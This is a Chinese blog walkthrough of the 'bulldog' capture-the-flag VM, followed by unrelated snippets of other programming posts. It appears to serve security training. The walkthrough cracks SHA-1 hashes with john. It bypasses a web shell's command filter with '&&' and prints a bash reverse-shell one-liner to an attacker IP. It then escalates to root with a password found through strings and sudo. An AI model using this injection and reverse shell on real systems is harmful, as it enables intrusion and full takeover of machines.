当前位置：首页 > news >正文

bulldog 靶机

news 2026/2/10 2:36:25

bulldog

信息搜集

存活检测

详细扫描

后台网页扫描

网页信息搜集

正在开发的如果你正在读这篇文章，你很可能是Bulldog Industries的承包商。恭喜你!我是你们的新老板，组长艾伦·布鲁克。CEO解雇了整个开发团队和员工。因此，我们需要迅速招到一批人。我要试着给你上一堂牛头犬工业网站的速成课。之前的网站是怎么被攻击的?APT利用了网络服务器上的一个漏洞获得了一个低权限shell。从那里，他们利用脏牛在盒子上生根。在那之后，整个系统被接管，他们破坏了网站。我们仍在从旧系统向新系统过渡。同时，我们正在使用一些文件，这些文件可能是从原始系统中损坏的。我们还没来得及确认有没有被黑的痕迹所以如果你发现了，给我发邮件。我们如何防止未来的违规行为?应Churchy先生的要求，我们将从新服务器上完全移除PHP。此外，我们不会使用PHPMyAdmin或任何其他流行的CMS系统。我们的任务是创造我们自己的。新系统的设计?新网站将完全用Django编写(Mr. Churchy要求“高端技术时髦的东西”)。到目前为止，系统上已经启用了SSH。当我们将转换到使用Web-Shell(一个专有的shell接口)时，这个功能将很快关闭。下面的链接解释了这个工具。另外，请注意，我们将开始使用MongoDB，但是我们还没有完全安装它。还要注意的是，我们将实施一个革命性的AV系统，这是由供应商为我们定制的。它宣称能够每分钟运行一次，以检测入侵和黑客行为。一旦它启动并运行，我们将把它安装到系统上。Web-Shell我该找谁开始呢?组长:alan@bulldogindustries.com备用组长:william@bulldogindustries.com前端:malik@bulldogindustries.com前端:kevin@bulldogindustries.com后端:ashley@bulldogindustries.com后端:nick@bulldogindustries.com数据库:sarah@bulldogindustries.com

在此界面的源码中发现了疑似加密的信息，依次解密查看

Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->.0

管理员登陆

解析密码加密方式
```
hash-identifier
```
sha-1 解密

将密文存储到文件中

john 解密
```
john --format=raw-sha1 pas
```
破解出密文 bulldog
尝试当作密码登录管理员界面

显示登陆成功，但没权限
但此时 /dev/shell 界面可执行指令

反弹 shell

执行允许的命令外的命令会被过滤

尝试绕过

/usr/bin/ping 127.0.0.1 -c 2

失败

pwd&&ping 127.0.0.1 -c 2

可以使用 && 对过滤进行绕过

kali 开启监听

命令框输入链接反弹 shell 命令

pwd&&bash -c "bash -i >& /dev/tcp/10.4.7.132/7777 0>&1"

成功连接

提权

查找敏感文件

查看二进制文件中可打印的字符

strings customPermissionApp

密码

SUPERultimatePASSWORDyouCANTget

切换用户，提示必须在终端执行

创建一个新的终端

python -c 'import pty;pty.spawn("/bin/sh")'

切换 root
```
sudo su root
```
输入密码，提权成功

bulldog 靶机

bulldog 信息搜集存活检测详细扫描后台网页扫描网页信息搜集正在开发的如果你正在读这篇文章，你很可能是Bulldog Industries的承包商。恭喜你!我是你们的新老板，组长艾伦布鲁克。CEO解雇了整个开发团队和员工。因此，我们需要迅速招到一…...

编程日记 2023/10/20 1:52:23

如何借助边缘智能网关打造智慧城市便民驿站

智慧城市驿站是一类提供多样化便利服务的新型智能公共设施，通过融合物联网技术、边缘智能技术、新能源技术等，为城市居民整合提供休闲、购物、卫生、广告、安全等公共服务，进一步提升日常生活体验。本篇就为大家介绍如何基于边缘智能网关&…...

编程日记 2023/10/20 1:51:22

谈谈电商App的压测

背景最近恰逢双十一，大大小小的电商app在双十一之前都会做一次压测，曾经在小公司工作的时候很想知道大公司是如何压测的，有什么高深的压测工具没，本文就来揭露一下压测真相在确认使用什么压测工具进行压测之前，我…...

编程日记 2023/10/20 1:49:21

VsCode修改侧边栏字体大小——用缩放的方法

缩放界面字体百分比（包括编辑器界面） 如果只修改文本编辑区的字体大小，可以在File -> Preferences -> Settings 中修改font的大小。但是侧边栏的字体不会改变，所以可以使用缩放的方法先修改整个界面的字体大小，…...

编程日记 2023/10/20 1:48:19

基于Java的农资采购销售管理系统设计与实现(源码+lw+部署文档+讲解等)

文章目录前言具体实现截图论文参考详细视频演示为什么选择我自己的网站自己的小程序（小蔡coding） 代码参考数据库参考源码获取前言 💗博主介绍：✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师、全栈领域优质创作者&am…...

编程日记 2023/10/20 1:47:18

【AIGC核心技术剖析】扩大富有表现力的人体姿势和形状估计SMPLer-X模型

富有表现力的人体姿势和形状估计 (EHPS) 将身体、手和面部运动捕捉与众多应用结合起来。尽管取得了令人鼓舞的进展，但当前最先进的方法仍然在很大程度上依赖于有限的训练数据集。在这项工作中，我们研究了将 EHPS 扩展到第一个通用基础模型（称为 SMPLer-X），以 ViT-Huge 作为…...

编程日记 2023/10/20 1:46:17

【C++面向对象】1. 类、对象

文章目录【 1. 类 & 对象的定义】1.1 类的定义1.2 对象的定义【 2. 类的成员】2.1 数据成员2.2 成员函数类的内部定义成员函数类的外部定义成员函数成员函数的访问实例【 3. 类的访问修饰符】3.1 public 公有成员3.2 private 私有成员3.3 protected 保护成员3.4 继承…...

编程日记 2023/10/20 1:45:16

PAM从入门到精通（十三）

接前一篇文章：PAM从入门到精通（十二） 本文参考： 《The Linux-PAM Application Developers Guide》先再来重温一下PAM系统架构： 更加形象的形式： 五、主要函数详解 11. pam_open_session 概述&…...

编程日记 2023/10/20 1:44:15

Stable Diffusion WebUI几种解决手崩溃的方法

1. 添加与手相关负面提示词如何提价提示词呢？首先有一个embeddings模型文件bad-hands-5，我们可以去各个大模型网站去搜，我是在C站上面下载的。附上C站地址：https://civitai.com/ 下载好之后，你需要将文件放入stable-diffusion-webui\embeddings目录中。位置如下所示…...

编程日记 2023/10/20 1:42:12

kr 第三阶段（一）16 位汇编

为什么要学习 16 位汇编？ 16 位汇编包含了大部分 32 位汇编的知识点。有助于在学习内核的两种模式。实模式：访问真实的物理内存保护模式：访问虚拟内存有助于提升调试能力，调试命令与 OllyDbg 和 WinDebug 通用。可以学习实现反…...

编程日记 2023/10/20 1:41:10

power point导出pdf保留字体

在 slides 中用到非自带的字体，如 [1]，想导出成 pdf 文件（因为导出成图，如 png，放大会蒙），并在别人电脑里也保留字体。除了让别人也装上相应字体，可以： 参考 [2]&#x…...

编程日记 2023/10/20 1:40:09

云务器迁移（腾讯云＞华为云）

自己平时除了写些bug外还喜欢玩玩服务器，这不前几年买了一个域名，当时服务器买的是阿里云的，想着域名备案挺麻烦的就一直用着，只是在服务器到期后会重新购买其他运营商的（关键是续不起🤫） 这不最…...

编程日记 2023/10/20 1:39:08

[USACO11MAR] Brownie Slicing G题解(二分+二维前缀和+矩阵分割）

[USACO11MAR] Brownie Slicing G 题目地址 P3017 [USACO11MAR] Brownie Slicing G 思路二分最大化最小值切割思路： 一行一行进行切割，如果这一行可以切割出b块大于等于mid的块，就开始切割下一行如果无法切割出b块，就把正在…...

编程日记 2023/10/20 1:38:07

【每日一题】—— B. Arrays Sum （Grakn Forces 2020）

🌏博客主页：PH_modest的博客主页 🚩当前专栏：每日一题 💌其他专栏： 🔴 每日反刍 🟡 C跬步积累 🟢 C语言跬步积累 🌈座右铭：广积粮，缓称…...

编程日记 2023/10/20 1:37:06

XTU-OJ 1328-数码和

题目描述一个10进制数n在2∼16进制下可以得到的不同的数码和，求在这些数码和中出现次数最多的数码和。比如20， 进制2345678910111213141516数码10100202110403226242220191817161514数码和2424586421098765 其中数码和2和4分别出现了3次，为…...

编程日记 2023/10/20 1:36:05

混入组件 (mixin)

1 什么是混入以及作用 *混入 (mixin) 提供了一种非常灵活的方式，来分发 Vue 组件中的可复用功能。一个混入对象可以包含任意组件选项。当组件使用混入对象时，所有混入对象的选项将被“混合”进入该组件本身的选项。作用：主要作用是继承和封装…...

编程日记 2023/10/20 1:35:04

ubuntu18.04 RTX3060 rangnet++训练

代码链接： https://github.com/PRBonn/lidar-bonnetal 安装anaconda环境为 CUDA 11.0（11.1也可以） anaconda环境如下 numpy1.17.2 torchvision0.2.2 matplotlib2.2.3 tensorflow1.13.1 scipy0.19.1 pytorch1.7.1 vispy0.5.3 opencv_python…...

编程日记 2023/10/20 1:34:03

HZOJ-72：猜拳

题目描述在一次聚会中，每人拿着一张印有石头、剪刀、布的卡片，每个人具体拿得是哪种卡片不得而知。现在告诉你某些人之间的胜负关系，并会询问某两个人之间的对战结果，人按照从 11 到 n� 编号。对于每个…...

编程日记 2023/10/20 1:33:02

【Django 03】QuerySet 和 Instance应用

1. DRF QuerySet 和 Instance功能概述 1.1 QuerySet 从数据库中查询结果存放的集合称为 QuerySet。 Django ORM用到三个类：Manager、QuerySet、Model。每个Model都有一个默认的 manager实例，名为objects。Django的ORM通过Mode的objects属性提供各种数据…...

编程日记 2023/10/20 1:32:02

安装 mysql

gpt: 要在 Debian 11 上安装 MySQL 数据库服务器，您可以使用以下步骤： 1. **更新软件包列表**：在安装任何软件之前，始终建议首先更新软件包列表，以确保获取最新的软件包信息。在终端中运行以下命令： bash…...

编程日记 2023/10/20 1:31:01

uniapp 对接腾讯云IM群组成员管理（增删改查）

UniApp 实战：腾讯云IM群组成员管理（增删改查） 一、前言在社交类App开发中，群组成员管理是核心功能之一。本文将基于UniApp框架，结合腾讯云IM SDK，详细讲解如何实现群组成员的增删改查全流程。权限校验…...

编程新知 2026/1/13 9:59:27

K8S认证|CKS题库+答案| 11. AppArmor

目录 11. AppArmor 免费获取并激活 CKA_v1.31_模拟系统题目开始操作： 1）、切换集群 2）、切换节点 3）、切换到 apparmor 的目录 4）、执行 apparmor 策略模块 5）、修改 pod 文件 6）、…...

编程新知 2026/1/29 2:11:35

Leetcode 3577. Count the Number of Computer Unlocking Permutations

Leetcode 3577. Count the Number of Computer Unlocking Permutations 1. 解题思路2. 代码实现题目链接：3577. Count the Number of Computer Unlocking Permutations 1. 解题思路这一题其实就是一个脑筋急转弯，要想要能够将所有的电脑解锁&#x…...

编程新知 2026/1/4 2:33:39

PL0语法，分析器实现！

简介 PL/0 是一种简单的编程语言，通常用于教学编译原理。它的语法结构清晰，功能包括常量定义、变量声明、过程（子程序）定义以及基本的控制结构（如条件语句和循环语句）。 PL/0 语法规范 PL/0 是一种教学用的小型编程语言，由 Niklaus Wirth 设计，用于展示编译原理的核…...

编程新知 2026/1/29 17:06:33

Maven 概述、安装、配置、仓库、私服详解

目录 1、Maven 概述 1.1 Maven 的定义 1.2 Maven 解决的问题 1.3 Maven 的核心特性与优势 2、Maven 安装 2.1 下载 Maven 2.2 安装配置 Maven 2.3 测试安装 2.4 修改 Maven 本地仓库的默认路径 3、Maven 配置 3.1 配置本地仓库 3.2 配置 JDK 3.3 IDEA 配置本地 Ma…...

编程新知 2026/2/8 1:58:01

以光量子为例，详解量子获取方式

光量子技术获取量子比特可在室温下进行。该方式有望通过与名为硅光子学（silicon photonics）的光波导（optical waveguide）芯片制造技术和光纤等光通信技术相结合来实现量子计算机。量子力学中，光既是波又是粒子。光子本…...

编程新知 2026/2/7 11:51:32

九天毕昇深度学习平台 | 如何安装库？

pip install 库名 -i https://pypi.tuna.tsinghua.edu.cn/simple --user 举个例子： 报错 ModuleNotFoundError: No module named torch 那么我需要安装 torch pip install torch -i https://pypi.tuna.tsinghua.edu.cn/simple --user pip install 库名&#x…...

编程新知 2026/1/31 2:13:57

C++ 设计模式《小明的奶茶加料风波》

👨‍🎓 模式名称：装饰器模式（Decorator Pattern） 👦 小明最近上线了校园奶茶配送功能，业务火爆，大家都在加料： 有的同学要加波霸 🟤，有的要加椰果…...

编程新知 2026/1/31 8:45:21

SQL Server 触发器调用存储过程实现发送 HTTP 请求

文章目录需求分析解决第 1 步：前置条件，启用 OLE 自动化方式 1：使用 SQL 实现启用 OLE 自动化方式 2：Sql Server 2005启动OLE自动化方式 3：Sql Server 2008启动OLE自动化第 2 步：创建存储过程第 3 步：创建触发器扩展 - 如何调试？第 1 步：登录 SQL Server 2008第 2 步…...

编程新知 2025/9/11 6:56:11

AD学习（3）

1 PCB封装元素组成及简单的PCB封装创建封装的组成部分： （1）PCB焊盘：表层的铜 ，top层的铜 （2）管脚序号：用来关联原理图中的管脚的序号，原理图的序号需要和PCB封装一一…...

编程新知 2026/2/8 10:47:16